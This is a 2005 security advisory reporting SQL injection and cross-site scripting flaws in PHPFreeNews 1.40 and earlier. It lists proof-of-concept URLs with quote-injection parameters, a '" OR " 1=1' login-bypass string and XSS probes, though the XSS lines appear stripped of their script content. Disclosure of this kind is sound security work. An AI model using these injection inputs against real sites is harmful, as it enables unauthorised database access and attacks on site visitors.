|
PHPFreeNews SQL Injection and XSS |
|
|
|
|
Friday, 19 August 2005 |
Summary
PHPFreeNews is "a free PHP Script that allows you to display news headlines and articles on your website".
PHPFreeNews has been found to be vulnerable to numerous SQL Injection and Cross Site Scripting vulnerabilities.
Credit:
The information has been provided by matrix_killer.
Details
Vulnerable Systems:
* PHPFreeNews version 1.40 and prior
SQL Injection:
Accessing any of the following URLs:
http://vulnerable/phpfn/SearchResults.php?Match=&NewsMode=1& SearchNews=Search&CatID=0
http://vulnerable/phpfn/SearchResults.php?Match=1&NewsMode=1& SearchNews=Search&CatID=
http://vulnerable/phpfn/SearchResults.php?Match=%27&NewsMode=1& SearchNews=Search&CatID=0
http://vulnerable/phpfn/SearchResults.php?Match=1&NewsMode=1& SearchNews=Search&CatID=%27
Will cause the server to return the following:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in somepathwwwphpfnIncListingFunctions.php on line 92
Query failed : You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near
IN BOOLEAN MODE) ORDER BY Sticky DESC, Priority, PostDate
In addition, accessing the following URL: http://vulnerable/phpfn/Inc/AccessControl.php and typing as the username and password some SQL injection string like " OR " 1=1 will cause the server to return an error.
Cross Site Scripting:
Accessing any of the following URLs, will trigger a cross site scripting vulnerability in the page being accessed:
http://vulnerable/phpfn/NewsCategoryForm.php?NewsMode=">&CatID=0
http://vulnerable/phpfn/SearchResults.php?Match=>& NewsMode=1&SearchNews=Search&CatID=0
http://vulnerable/phpfn/SearchResults.php?Match=1& NewsMode=1&SearchNews=Search&CatID=>
http://vulnerable/phpfn/SearchResults.php?Match=1& NewsMode=">&SearchNews=Search&CatID=0
http://vulnerable/phpfn/SearchResults.php?Match=">& NewsMode=1&SearchNews=Search&CatID=0
|